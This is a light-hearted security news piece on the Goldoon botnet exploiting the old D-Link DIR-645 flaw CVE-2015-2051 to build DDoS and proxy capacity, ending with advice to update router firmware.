D-Link Disaster: Goldoon Botnet Hijacks Routers with Ancient Flaw for Stealthy Attacks

In a digital heist that’s both audacious and nostalgic, Goldoon botnet resurrects the ghost of CVE-2015-2051 to haunt old D-Link routers. Watch out – your router might just be the zombie in a DDoS thriller! 🧟‍♂️💻

Hot Take:

Hey, 2015 called; they want their router vulnerability back! Goldoon botnet is out here making a vintage security flaw the new black, turning D-Link routers into the cyber-equivalent of zombie extras in a B-movie about world domination through DDoS attacks. I mean, who needs time travel when hackers are recycling old hits like they’re on a nostalgia tour?!

Key Points:

  • Goldoon botnet is exploiting CVE-2015-2051, an oldie-but-a-goodie critical flaw in D-Link DIR-645 routers, because why not?
  • Successfully exploited devices become puppets that can launch further attacks, including the ever-so-classy DDoS.
  • The botnet’s payload is as universal as a Swiss Army knife, compatible with a buffet of Linux system architectures.
  • Attempts to directly access the malware’s endpoint are met with a cheeky “Sorry, you are an FBI Agent” message – talk about adding insult to injury.
  • While the rest of us update our TikTok dances, cybercriminals are updating their botnets, using old vulnerabilities to turn routers into covert cyber-spy dens.
Cve id: CVE-2015-2051
Cve state: PUBLISHED
Cve assigner short name: mitre
Cve date updated: 12/29/2016
Cve description: The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.

Need to know more?

Back to the Future: Botnet Edition

Most people revisit the past by flipping through photo albums, but it seems hackers prefer a more interactive approach. They've dusted off the CVE-2015-2051 vulnerability, giving it a new lease on life. This flaw is like a VIP backdoor pass to D-Link routers, allowing Goldoon to control the devices better than any puppeteer could dream of. The initial spike in botnet activity was spotted around April 2024, just in time for spring cleaning – if by cleaning you mean sweeping up compromised devices.

One Payload to Rule Them All

Goldoon isn't picky; it'll take any flavor of Linux system architecture it can get its hands on. Once the dropper script is in, it's like a bad tenant that not only refuses to leave but also invites over all its rowdy friends (aka the Goldoon malware). The malicious payload makes itself at home, sets up shop, and then, like a ghost, tries to erase any evidence that it was ever there.

Don't Feed the Trolls

It seems the botnet has both a sense of humor and a flair for drama. If you try to visit the malware's endpoint, it greets you with a snarky message for FBI agents, followed by an internet version of "I will look for you, I will find you, and I will kill you." Clearly, somebody's been watching too many spy movies.

Hide and Seek: Router Edition

These routers aren't just launching attacks; they're also playing a wicked game of cyber hide-and-seek. By using the hacked routers as proxies, malicious activities blend in with normal traffic, turning detection into a game for Sherlock Holmes. This isn't just a theory; it's happening right now, with the MooBot and Ngioweb botnets having a field day with Ubiquiti EdgeRouters.

Router's New Job: Covert Listening Posts

Last but not least, it turns out our routers are moonlighting as covert listening posts. They're quietly sitting there, collecting all sorts of network traffic, and probably gossiping about it with their botnet overlords. Trend Micro points out that internet routers are prized possessions in the cyber underworld due to their reduced security monitoring and powerful OS capabilities. So, the next time your router blinks at you, it might just be sending Morse code to its hacker buddies.

Remember kids, in the world of cybersecurity, what's old can be new again, and your router might just be the most popular device at the cybercrime party. Keep your firmware updated, or you might as well roll out the red carpet for these digital party crashers!

Tags: compromised devices, critical vulnerability, CVE-2015-2051, DDoS Attacks, Goldoon botnet, Remote Code Execution, Router Security